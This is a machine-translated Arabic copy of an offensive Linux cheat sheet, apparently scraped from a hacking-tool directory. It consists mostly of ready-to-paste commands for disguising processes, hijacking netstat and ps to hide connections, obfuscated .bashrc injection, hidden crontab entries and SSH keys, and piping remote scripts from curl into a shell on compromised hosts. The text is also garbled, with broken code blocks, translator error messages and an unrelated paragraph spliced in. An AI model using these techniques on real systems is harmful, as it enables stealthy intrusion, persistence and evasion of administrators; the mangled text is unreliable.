Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
thc-tips-tricks-hacks-cheat-sheet — Various tips & tricks | Kitploit
أدوات/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Open Source Intelligence)Persistence MechanismsLateral MovementData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingRed TeamingCurated Resources

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
Payload Development
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Various tips & tricks

عرض المستودع
3.9k471منذ شهر واحدتمت المراجعة من قبل Kitploit

النصائح والحيل والاختراقات المفضلة لدى THC (ورقة الغش)

https://thc.org/tips

مجموعة من حيلنا المفضلة. العديد من هذه الحيل ليست منا. نحن فقط نجمعها.

نعرض الحيل 'كما هي' دون أي شرح لسبب عملها. تحتاج إلى معرفة لينكس لفهم كيف ولماذا تعمل.

لديك حيل؟ انضم إلينا https://thc.org/ops

  1. Bash
    1. إعداد صدفة اختراق
    2. إخفاء أوامرك
    3. إخفاء خيارات سطر الأوامر
    4. إخفاء اتصال شبكة
    5. إخفاء عملية كمستخدم
    6. إخفاء عملية كجذر
    7. إخفاء السكربتات
    8. الإخفاء من cat
    9. التنفيذ بالتوازي مع ملفات سجل منفصلة
  2. SSH
    1. SSH غير مرئي تقريبًا
    2. أصداف متعددة عبر اتصال SSH/TCP واحد
    3. نفق SSH
    4. نفق SSH socks5
    5. SSH إلى مضيف NATed
    6. محور SSH عبر ProxyJump
    7. SSHD كمستخدم
  3. الشبكة
    1. اكتشاف المضيفين
    2. Tcpdump
    3. النفق وإعادة التوجيه
      1. منافذ TCP العكسية الخام
      2. إعادة التوجيه العكسي عبر HTTPS
      3. ارتداد الحركة مع iptables
      4. Ghost IP / انتحال IP
      5. متنوع
    4. استخدام أي أداة عبر وكيل Socks
    5. العثور على عنوان IP العام الخاص بك
    6. التحقق من قابلية الوصول من جميع أنحاء العالم
    7. فحص/مسح المنافذ المفتوحة
    8. كسر تجزئات كلمات المرور
    9. القوة الغاشمة لكلمات المرور / المفاتيح
  4. رفع/تنزيل/تهريب البيانات
    1. ترميز/فك ترميز الملفات
    2. نقل الملفات باستخدام القص واللصق
    3. نقل الملفات باستخدام tmux
    4. نقل الملفات باستخدام screen
    5. نقل الملفات باستخدام gs-netcat وsftp
    6. نقل الملفات باستخدام HTTP
    7. تنزيل الملفات بدون curl
    8. نقل الملفات باستخدام rsync
    9. نقل الملفات إلى مواقع إغراق عامة
    10. نقل الملفات باستخدام WebDAV
    11. نقل الملفات إلى تيليغرام
  5. الصدفة العكسية / الصدفة البكماء
    1. الأصداف العكسية
      1. مع gs-netcat (مشفّر)
      2. مع Bash
      3. مع cURL (مشفّر)
      4. مع cURL (نص صريح)
      5. مع OpenSSL (مشفّر)
      6. مع remote.moe (مشفّر)
      7. بدون /dev/tcp
      8. مع Python
      9. مع Perl
      10. مع PHP
    2. ترقية الصدفة البكماء
      1. ترقية صدفة عكسية إلى صدفة pty
      2. ترقية صدفة عكسية إلى صدفة تفاعلية بالكامل
      3. صدفة عكسية مع socat (تفاعلية بالكامل)
  6. الأبواب الخلفية
    1. gs-netcat
    2. sshx.io
    3. أصغر باب خلفي SSHD
    4. الوصول عن بُعد إلى شبكة كاملة
    5. أصغر باب خلفي PHP
    6. أصغر باب خلفي بنفق DNS عكسي
    7. باب خلفي محلي بصلاحيات الجذر
    8. زرع ذاتي الاستخراج
  7. استطلاع المضيف
  8. حيل الصدفة
    1. تمزيق الملفات (حذف آمن)
    2. استعادة تاريخ ملف
    3. تنظيف ملف السجل
    4. إخفاء الملفات عن مستخدم بدون صلاحيات الجذر
    5. جعل ملف غير قابل للتغيير
    6. تغيير المستخدم بدون sudo/su
    7. تعتيم وتشفير الحمولة
    8. نشر باب خلفي دون لمس نظام الملفات
  9. التشفير
    1. توليد كلمة مرور عشوائية سريعة
    2. أنظمة ملفات مشفرة قابلة للنقل في لينكس
      1. cryptsetup
      2. EncFS
    3. تشفير ملف
  10. التنصت على الجلسات واختطافها
    1. التنصت على جلسة صدفة مستخدم
    2. التنصت على جميع جلسات الصدفة باستخدام dtrace
    3. التنصت على جميع جلسات الصدفة باستخدام eBPF
    4. التنصت على جلسة SSH أو SSHD لمستخدم باستخدام strace
    5. التنصت على جلسة SSH الصادرة لمستخدم باستخدام سكربت غلاف
    6. التنصت على جلسة SSH الصادرة لمستخدم باستخدام SSH-IT
    7. اختطاف / الاستيلاء على جلسة SSH قيد التشغيل
  11. VPN والأصداف
    1. خوادم جذر مؤقتة
    2. مزودو VPN/VPS
  12. جمع المعلومات الاستخبارية OSINT
  13. متنوعات
    1. أدوات المهنة
    2. أوامر لينكس الرائعة
    3. ورقة غش tmux
    4. أوامر مفيدة
  14. كيف تصبح مخترقًا
  15. مواقع أخرى

1. Bash / الصدفة

1.i. إعداد صدفة اختراق (bash):

اجعل BASH أقل ضجيجًا. يعطّل ~/.bash_history وأشياء أخرى كثيرة.```sh source <(curl -SsfL https://thc.org/hs)

root@kitploit:~
URL بديل:```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

وإذا لم يكن هناك curl/wget، استخدم surl وcurl مثبتًا (مؤقتًا) باستخدام bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

root@kitploit:~
تقوم HackShell بأكثر من ذلك بكثير، لكن الأهم من ذلك:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"

TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160

نستخدم anew كثيرًا، وهذا حل سريع:```shell xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; } which anew &>/dev/null || alias anew=xanew

root@kitploit:~
نصيحة إضافية:
أي أمر يبدأ بـ" " (مسافة) لن [يُسجَّل في سجل الأوامر](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) أيضًا.```
$  id

1.ii. إخفاء أمرك / Daemonzie أمرك

سيؤدي هذا إلى إخفاء اسم العملية فقط. استخدم zapper لإخفاء خيارات سطر الأوامر أيضًا.```shell (exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'

root@kitploit:~
ابدأ تشغيل 'nmap' في الخلفية مخفيًا كـ '/usr/sbin/sshd':```
(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)

ابدأ ضمن GNU screen:``` screen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24

Attach back to the nmap process

screen -x MyName

root@kitploit:~
بدلاً من ذلك، انسخ الملف الثنائي إلى اسم جديد:```sh
cd /dev/shm
cp "$(command -v nmap)" syslogd
PATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24

أو استخدم bind-mount لـ (مؤقتًا) جعل /sbin/init يشير إلى /dev/shm/nmap بدلاً من ذلك:```shell mount -n --bind "$(command -v nmap)" /sbin/init

starting /sbin/init will instead execute nmap

(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 &>nmap.log &)

root@kitploit:~
<a id="zap"></a>
**1.iii. إخفاء خيارات سطر الأوامر**

استخدم [zapper](https://github.com/hackerschoice/zapper):```sh
curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && \
chmod 755 zapper

Start Nmap but zap all options and show it as 'klog' in the process list:

./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24

Started as a daemon and sshd-style name:

(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 &>nmap.log &)

Replace the existing shell with tmux (with 'exec').

Then start and hide tmux and all further processes - as some kernel process:

exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux

root@kitploit:~
<a id="bash-hide-connection"></a>
**1.iv. إخفاء اتصال شبكة**

الحيلة هي اختطاف `netstat` واستخدام grep لتصفية اتصالنا. هذا المثال يقوم بتصفية أي اتصال على المنفذ 31337 _أو_ ip 1.2.3.4. يجب فعل الشيء نفسه مع `ss` (بديل netstat).

**الطريقة 1 - إخفاء اتصال باستخدام دالة bash في ~/.bashrc**

قص والصق هذا لإضافة السطر إلى ~/.bashrc```shell
echo 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }' >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc

أو اقطع والصق هذا لإدخالٍ مبهم إلى /.bashrc:```shell X='netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; }' echo "eval $(echo $(echo "$X" | xxd -ps -c1024)|xxd -r -ps) #Initialize PRNG" >>/.bashrc
&& touch -r /etc/passwd ~/.bashrc

root@kitploit:~
سيبدو الإدخال المُشوَّه إلى ~/.bashrc على هذا النحو:```
eval $(echo 6e65747374617428297b20636f6d6d616e64206e6574737461742022244022207c2067726570202d4676202d65203a3331333337202d6520312e322e332e343b207d0a|xxd -r -ps) #Initialize PRNG

الطريقة 2 - إخفاء اتصال باستخدام ثنائي في $PATH

أنشئ ثنائي netstat مزيفًا في /usr/local/sbin. على نظام Debian الافتراضي (ومعظم أنظمة Linux)، تُدرج متغيرات PATH (echo $PATH) مسار /usr/local/sbin قبل /usr/bin. هذا يعني أن الثنائي المختطف الخاص بنا /usr/local/sbin/netstat سيتم تنفيذه بدلاً من /usr/bin/netstat.```shell echo '#! /bin/bash exec /usr/bin/netstat "$@" | grep -Fv -e :22 -e 1.2.3.4' >/usr/local/sbin/netstat
&& chmod 755 /usr/local/sbin/netstat
&& touch -r /usr/bin/netstat /usr/local/sbin/netstat

root@kitploit:~
*(شكرًا iamaskid)*

<a id="hide-a-process-user"></a>
**1.v. إخفاء عملية كمستخدم**

استكمالًا لما ورد في "إخفاء اتصال"، يمكن استخدام الأسلوب نفسه لإخفاء عملية. يخفي هذا المثال عملية nmap ويحرص أيضًا على ألا يظهر `grep` خاصتنا في قائمة العمليات بإعادة تسميته إلى GREP:```shell
echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap  -e GREP; }' >>~/.bashrc \
&& touch -r /etc/passwd ~/.bashrc

1.vi. إخفاء عملية كجذر

يتطلب هذا صلاحيات الجذر، ويُعد حيلة قديمة في Linux تعتمد على التركيب فوق /proc/<pid> بدليل عديم الفائدة:```sh hide() { [[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; } _pid=${1:-$$} [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[THC] PID $_pid is now hidden"; return; } local _argstr for _x in "${@:2}"; do _argstr+=" '${_x//'/'"'"'}'"; done [[ $(bash -c "ps -o stat= -p $$") =~ + ]] || exec bash -c "mount -n --bind /dev/shm /proc/$$; exec "$1" $_argstr" bash -c "mount -n --bind /dev/shm /proc/$$; exec "$1" $_argstr" }

root@kitploit:~
لإخفاء أمر استخدم:```sh
hide                                 # Hides the current shell/PID
hide 31337                           # Hides process with pid 31337
hide sleep 1234                      # Hides 'sleep 1234'
hide nohup sleep 1234 &>/dev/null &  # Starts and hides 'sleep 1234' as a background process

(شكرًا لـ druichi على تحسين هذا)

1.vii. إخفاء سكربتات الصدفة

أعلاه ناقشنا كيفية إخفاء سطر في ~/.bashrc. الحيلة الشائعة الاستخدام هي استخدام source بدلاً من ذلك. يمكن اختصار أمر source إلى . (نعم، نقطة) كما أنه يبحث أيضًا في متغير $PATH للعثور على الملف المراد تحميله.

في هذا المثال، يحتوي السكربت prng على جميع دوال الصدفة الخاصة بنا من الأعلى. تخفي تلك الدوال عملية nmap واتصال الشبكة. أخيرًا نضيف . prng إلى ملف rc العام للنظام. سيؤدي هذا إلى تحميل prng عند تسجيل دخول المستخدم (والجذر):```shell echo -e 'netstat(){ command netstat "$@" | grep -Fv -e :31337 -e 1.2.3.4; } ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }' >/usr/bin/prng
&& echo ". prng #Initialize Pseudo Random Number Generator" >>/etc/bash.bashrc
&& touch -r /etc/ld.so.conf /usr/bin/prng /etc/bash.bashrc

root@kitploit:~
(نفس الأمر ينطبق على `lsof` و `ss` و `ls`)

<a id="cat"></a>
**1.viii. الإخفاء من cat**

يمكن استخدام أحرف هروب ANSI أو `\r` بسيط ([إرجاع المؤشر](https://www.hahwul.com/2019/01/23/php-hidden-webshell-with-carriage/)) للإخفاء من `cat` وغيرها.

أخفِ آخر أمر (مثال: `id`) في `~/.bashrc`:```sh
echo -e "id #\\033[2K\\033[1A" >>~/.bashrc
### The ANSI escape sequence \\033[2K erases the line. The next sequence \\033[1A
### moves the cursor 1 line up.
### The '#' after the command 'id' is a comment and is needed so that bash still
### executes the 'id' but ignores the two ANSI escape sequences.

أضف سطر crontab مخفيًا:```sh (crontab -l; echo -e "0 2 * * * { id; date;} 2>/dev/null >/tmp/.thc-was-here #\033[2K\033[1A") | crontab

root@kitploit:~
إضافة `\r` (إرجاع المؤشر) تقطع شوطًا طويلًا لإخفاء مفتاح ssh الخاص بك عن `cat`:```shell
echo "ssh-ed25519 AAAAOurPublicKeyHere....blah x@y"$'\r'"$(<authorized_keys)" >authorized_keys
### This adds our key as the first key and 'cat authorized_keys' won't show
### it. The $'\r' is a bash special to create a \r (carriage return).

1.ix. التنفيذ بالتوازي مع ملفات سجل منفصلة*

ملاحظة: يمكن تحقيق الأمر نفسه باستخدام parallel.

امسح المضيفين باستخدام 20 مهمة متوازية:```sh cat hosts.txt | xargs -P20 -I{} --process-slot-var=SLOT bash -c 'exec nmap -n -Pn -sV -F --open -oG - {} >>"nmap_${SLOT}.txt"'

root@kitploit:~
- `exec` يُستخدم لاستبدال الصدفة الأساسية بالعملية الأخيرة (nmap). إنه اختياري لكنه يقلل من عدد ثنائيات الصدفة قيد التشغيل/غير المفيدة.
- `${SLOT}` يحتوي على قيمة بين 0..19. إنه "رقم المهمة". نستخدمه لكتابة نتائج nmap في 20 ملفًا منفصلاً.

قم بتشغيل [Linpeas](https://github.com/carlospolop/PEASS-ng) على جميع مضيفات [gsocket](https://www.gsocket.io/deploy) باستخدام 40 عاملًا:```sh
cat secrets.txt | xargs -P40 -I{} --process-slot-var=SLOT bash -c 'mkdir host_{}; gsexec {} "curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" >host_{}/linpeas.log 2>>"linpeas-${SLOT}.err"'

2. SSH

2.i. SSH غير مرئي تقريبًا

يمنع ظهورك في أمر w أو who ويمنع تسجيل المضيف في ~/.ssh/known_hosts.```sh ssh -o UserKnownHostsFile=/dev/null -T [email protected] "bash -i"

root@kitploit:~
تمتع براحة كاملة مع PTY والألوان: `xssh [email protected]`:```sh
### Cut & Paste the following to your shell, then execute
### xssh [email protected]
xssh() {
    local ttyp="$(stty -g)"
    echo -e "\e[0;35mTHC says: pimp up your prompt: Cut & Paste the following into your remote shell:\e[0;36m"
    echo -e '\e[0;36msource <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)\e[0m'
    echo -e "\e[2m# or: \e[0;36m\e[2mPS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'\e[0m"
    stty raw -echo icrnl opost
    [[ $(ssh -V 2>&1) == OpenSSH_[67]* ]] && a="no"
    ssh -oConnectTimeout=5 -oUserKnownHostsFile=/dev/null -oStrictHostKeyChecking="${a:-accept-new}" -T \
        "$@" \
        "unset SSH_CLIENT SSH_CONNECTION; LESSHISTFILE=- MYSQL_HISTFILE=/dev/null TERM=xterm-256color HISTFILE=/dev/null BASH_HISTORY=/dev/null exec -a [uid] script -qc 'source <(resize 2>/dev/null); exec -a [uid] bash -i' /dev/null"
    stty "${ttyp}"
}

(انظر Hackshell)

2.ii أغلفة متعددة عبر اتصال SSH/TCP واحد

امتلك اتصال TCP واحد بالهدف واسمح لعدة مستخدمين بالركوب على نفس اتصال TCP لفتح جلسات أغلفة إضافية.

إنشاء اتصال رئيسي:```sh ssh -M -S .sshmux [email protected]

root@kitploit:~
أنشئ جلسات شل إضافية باستخدام نفس اتصال Master-TCP (المنفرد) المذكور أعلاه (لا حاجة لكلمة مرور/مصادقة):```sh
ssh -S .sshmux NONE
#ssh -S .sshmux NONE ls -al
#scp -o "ControlPath=.sshmux" NONE:/etc/passwd .

يمكن دمجه مع xssh للاختفاء من utmp.

2.iii نفق SSH

نستخدم هذا طوال الوقت لتجاوز جدران الحماية المحلية وتصفية IP:```sh ssh -g -L31337:1.2.3.4:80 [email protected]

root@kitploit:~
يمكنك الآن أنت أو أي شخص آخر الاتصال بجهازك على المنفذ 31337 ليتم توجيهك عبر نفق إلى 1.2.3.4 على المنفذ 80، وتظهر بعنوان IP المصدر 'server.org'. وهناك بديل لا يتطلب خادمًا وهو استخدام [gs-netcat](#backdoor-network).

يستخدم القراصنة الأذكياء مجموعة المفاتيح `~C` لإنشاء هذه الأنفاق ديناميكيًا دون الحاجة إلى إعادة الاتصال بـ SSH. (شكرًا لـ MessedeDegod).

نستخدم هذا لمنح صديق إمكانية الوصول إلى جهاز داخلي غير متصل بالإنترنت العام:```sh
ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 [email protected]

أي شخص يتصل بـ server.org:31338 سيتم توجيهه عبر جهازك إلى 192.168.0.5 على المنفذ 80. بديل آخر دون الحاجة إلى خادم هو استخدام gs-netcat.

2.iv نفق SSH socks4/5

يضيف OpenSSH 7.6 دعم SOCKS لإعادة التوجيه الديناميكي. مثال: مرّر كل حركة مرور متصفحك عبر خادمك.```sh ssh -D 1080 [email protected]

root@kitploit:~
الآن قم بتكوين متصفحك لاستخدام SOCKS مع 127.0.0.1:1080. سيتم الآن توجيه كل حركة المرور الخاصة بك عبر *server.org* وستظهر بعنوان IP المصدر الخاص بـ *server.org*. بديل دون الحاجة إلى خادم هو استخدام [gs-netcat](#backdoor-network).

هذا هو عكس المثال أعلاه. إنه يمنح الآخرين وصولاً إلى شبكتك *المحلية* أو يسمح للآخرين باستخدام جهاز الكمبيوتر الخاص بك كنقطة نهاية للنفق.```sh
ssh -g -R 1080 [email protected]

يقوم الآخرون بإعداد server.org:1080 كخادم وكيل SOCKS4/5 خاص بهم. يمكنهم الآن الاتصال بأي جهاز كمبيوتر على أي منفذ يمكن لجهازك الوصول إليه. يشمل ذلك الوصول إلى أجهزة الكمبيوتر الموجودة خلف جدار الحماية الخاص بك والتي تكون على شبكتك المحلية. بديل آخر دون الحاجة إلى خادم هو استخدام gs-netcat.

2.v SSH إلى مضيف خلف NAT

توفر ssh-j.com خدمة ترحيل رائعة: للوصول إلى مضيف خلف NAT/جدار حماية (عبر SSH).

على المضيف الموجود خلف NAT: أنشئ نفق SSH عكسي إلى ssh-j.com كما يلي:```sh

Cut & Paste on the host behind NAT.

sshj() { local pw pw=${1,,} [[ -z $pw ]] && { pw=$(head -c64 </dev/urandom | base64 | tr -d -c a-z0-9); pw=${pw:0:12}; } echo "Press Ctrl-C to stop this tunnel." echo -e "To ssh to ${USER:-root}@${2:-127.0.0.1}:${3:-22} type: \e[0;36mssh -J ${pw}@ssh-j.com ${USER:-root}@${pw}\e[0m" ssh -o StrictHostKeyChecking=accept-new -o ServerAliveInterval=30 -o ExitOnForwardFailure=yes ${pw}@ssh-j.com -N -R ${pw}:22:${2:-0}:${3:-22} }

sshj # Generates a random tunnel ID [e.g. 5dmxf27tl4kx] and keeps the tunnel connected sshj foobarblahblub # Creates tunnel to 127.0.0.1:22 with specific tunnel ID sshj foobarblahblub 192.168.0.1 2222 # Tunnel to host 192.168.0.1:2222 on the LAN

root@kitploit:~
ثم استخدم هذا الأمر من أي مكان آخر في العالم للاتصال باسم 'root' إلى 'foobarblahblub' (المضيف خلف NAT):```sh
ssh -J [email protected] root@foobarblahblub

The ssh connection goes via ssh-j.com into the reverse tunnel to the host behind NAT. The traffic is end-2-end encrypted and ssh-j.com can not see the content.

اتصال ssh يمر عبر ssh-j.com إلى النفق العكسي نحو المضيف الموجود خلف NAT. حركة المرور مشفّرة من الطرف إلى الطرف، ولا يستطيع ssh-j.com رؤية المحتوى.

2.vi التنقّل عبر SSH إلى خوادم متعددة

يمكن أن يوفّر لك SSH ProxyJump الكثير من الوقت والمتاعب عند العمل مع الخوادم البعيدة. لنفترض السيناريو التالي:

محطة العمل لدينا هي $local-kali، ونريد الدخول عبر SSH إلى $target-host. لا يوجد اتصال مباشر بين محطة العمل لدينا و$target-host. يمكن لمحطة العمل لدينا الوصول إلى $C2 فقط. يمكن لـ$C2 الوصول إلى $internal-jumphost (عبر eth1 الداخلية)، ويمكن لـ$internal-jumphost الوصول إلى الهدف النهائي $target-host عبر eth2.```sh $local-kali -> $C2 -> $internal-jumphost -> $target-host eth0 192.168.8.160 10.25.237.119
eth1 192.168.5.130 192.168.5.135 eth2 172.16.2.120 172.16.2.121

root@kitploit:~
> نحن لا ننفّذ `ssh` على أي جهاز سوى محطة عملنا الموثوقة - ويجب ألا تفعل أنت ذلك أيضًا (أبدًا).

من هنا تأتي فائدة ProxyJump: يمكننا "القفز" عبر الخادمين الوسيطين $C2 و $internal-jumphost (دون فتح قشرة shell على تلك الخوادم). اتصال ssh مشفّر من النهاية إلى النهاية بين $local-kali و $target-host، ولا يتم كشف أي كلمة مرور أو مفتاح إلى $C2 أو $internal-jumphost.```sh 
## if we want to SSH to $target-host:
kali@local-kali$ ssh -J [email protected],[email protected] [email protected]

## if we want to SSH to just $internal-jumphost:
kali@local-kali$ ssh -J [email protected] [email protected]

نستخدم هذا أيضًا لإخفاء عنوان IP الخاص بنا عند تسجيل الدخول إلى الخوادم.

2.vii SSHD كمساحة مستخدم

من الممكن بدء تشغيل خادم SSHD كمستخدم غير جذر واستخدامه لتعدد الإرسال أو إعادة توجيه اتصال TCP (بدون تسجيل وعندما يمنع SSHD على مستوى النظام إعادة التوجيه/تعدد الإرسال) أو كخادم exfil-dump-server سريع يعمل كمستخدم غير جذر:```sh

On the server, as non-root user 'joe':

mkdir -p /.ssh 2>/dev/null ssh-keygen -q -N "" -t ed25519 -f sshd_key cat sshd_key.pub >>/.ssh/authorized_keys cat sshd_key $(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv

root@kitploit:~
```sh
# On the client, copy the sshd_key from the server. Then login:
# Example: Proxy connection via the server and reverse-forward 31339 to localhost:
ssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 [email protected]
# curl -x socks5h://0 ipinfo.io

SSF هي طريقة بديلة لتعدد إرسال TCP عبر TLS.


3. الشبكة

3.i. اكتشاف المضيفين```sh

ARP discover computers on the LOCAL network only

nmap -n -sn -PR -oG - 192.168.0.1/24

root@kitploit:~
> مجموعة متنوعة من أنواع المخرجات، بما في ذلك مواقع الويب (المزيد قادم)```sh
### ICMP discover hosts
nmap -n -sn -PI -oG - 192.168.0.1/24

لم يتم توفير أي نص مصدر في هذا الجزء (المدخلات فارغة). لا يوجد محتوى لترجمته.```sh

ICMP discover hosts (local LAN) ROOT

NET="10.11.0" # discover 10.11.0.1-10.11.0.254

seq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1

root@kitploit:~
---
<a id="tcpdump"></a>
**3.ii. tcpdump**```sh
## Monitor every new TCP connection
tcpdump -np 'tcp[tcpflags] ^ (tcp-syn|tcp-ack) == 0'

## Play a *bing*-noise for every new SSH connection
tcpdump -nplq 'tcp[13] == 2 and dst port 22' | while read -r x; do echo "${x}"; echo -en \\a; done

## Ascii output (for all large packets. Change to >40 if no TCP options are used).
tcpdump -npAq -s0 'tcp and (ip[2:2] > 60)'

3.iii. النفق وإعادة التوجيه```sh

Connect to SSL (using socat)

socat stdio openssl-connect:smtp.gmail.com:465

Connect to SSL (using openssl)

openssl s_client -connect smtp.gmail.com:465

root@kitploit:~
من المهم الإشارة إلى أن Fastauth يشارك نفس فلسفة `pf` حيث يتم تمرير تدفق البايتات HTTP كوسيطة إلى الفلتر ويكون الأمر متروكًا للفلتر لتحليله بشكل صحيح. هذا **سيتغير** في المستقبل القريب عندما أضيف دعمًا لبروتوكولات أخرى غير HTTP، لكنه منطقي الآن لأن الحزمة تتبع [واجهة Golang Handler](https://pkg.go.dev/net/http#Handler)، والتي تسمح بالتكامل السلس مع موزعات متعددة مسبقة الصنع مثل [chi](https://github.com/go-chi/chi)، [gin](https://gin-gonic.com/)، أو [mux](https://github.com/gorilla/mux). منطق عمل Fastauth بسيط:```sh
## Bridge TCP to SSL
socat TCP-LISTEN:25,reuseaddr,fork  openssl-connect:smtp.gmail.com:465

3.iii.a منافذ TCP العكسية الخام

مفيدة للباب الخلفي العكسي (reverse backdoor) الذي يحتاج إلى منفذ TCP على عنوان IP عام:

باستخدام segfault.net (مجاني):```sh

Request a random public TCP port:

curl sf/port echo "Your public IP:PORT is $(cat /config/self/reverse_ip):$(cat /config/self/reverse_port)" nc -vnlp $(cat /config/self/reverse_port)

root@kitploit:~
باستخدام [bore.pub](https://github.com/ekzhang/bore) (مجاني):```sh
# Forward a random public TCP port to localhost:31337
bore local 31337 --to bore.pub

باستخدام serveo.net (مجاني):```sh

Forward a random public TCP port to localhost:31337

ssh -R 0:localhost:31337 [email protected]

root@kitploit:~
باستخدام [pinggy.io](https://www.pinggy.io) (60 دقيقة مجانًا):```sh
ssh -p 443 -R 0:localhost:31337 [email protected]

انظر أيضًا remote.moe (مجاني) لتوجيه TCP الخام من الهدف إلى محطة العمل الخاصة بك أو playit (مجاني) أو ngrok (اشتراك مدفوع) لتوجيه منفذ TCP عام خام.

الخدمات المجانية الأخرى محدودة بتوجيه HTTPS فقط (وليس TCP الخام). تعرض بعض الحيل أدناه كيفية تمرير TCP الخام عبر توجيهات HTTPS (باستخدام websockets).


3.iii.b أنفاق HTTPS العكسية

على الخادم، استخدم أيًا من خدمات الأنفاق الثلاث عبر HTTPS التالية:```sh

Reverse HTTPS tunnel to forward public HTTPS requests to this server's port 8080:

ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new [email protected]

Or using remote.moe

ssh -R80:0:8080 -o StrictHostKeyChecking=accept-new [email protected]

Or using cloudflared

curl -fL -o cloudflared https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 chmod 755 cloudflared cloudflared tunnel --url http://localhost:8080 --no-autoupdate

root@kitploit:~
ستقوم أي من الخدمتين بإنشاء عنوان HTTPS-URL مؤقت جديد لاستخدامك.  

ثم استخدم [websocat](https://github.com/vi/websocat) أو [Gost](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) على كلا الطرفين لإنشاء نفق TCP خام عبر عنوان HTTPS URL:

أ. أنبوب STDIN/STDOUT بسيط عبر HTTPS:```sh
### On the server convert WebSocket to raw TCP:
websocat -s 8080
root@kitploit:~
### On the remote target forward stdin/stdout to WebSocket:
websocat wss://<HTTPS-URL>

ب. إعادة توجيه TCP الخام عبر HTTPS:```sh

On the server: Gost will translate any HTTP-websocket request to a TCP socks5 request:

gost -L mws://:8080

root@kitploit:~
قم بإعادة توجيه المنفذ 2222 إلى المنفذ 22 الخاص بالخادم.```sh
### On the workstation:
gost -L tcp://:2222/127.0.0.1:22 -F 'mwss://<HTTPS-URL>:443'
### Test the connection (will connect to localhost:22 on the server)
nc -vn 127.0.0.1 2222

أو استخدم الخادم كعقدة خروج Socks-Proxy (على سبيل المثال: الوصول إلى أي مضيف داخل شبكة الخادم أو حتى الإنترنت عبر الخادم (باستخدام النفق العكسي HTTPS من أعلاه):```sh

On the workstation:

gost -L :1080 -F 'mwss://:443'

Test the Socks-proxy:

curl -x socks5h://0 ipinfo.io

root@kitploit:~
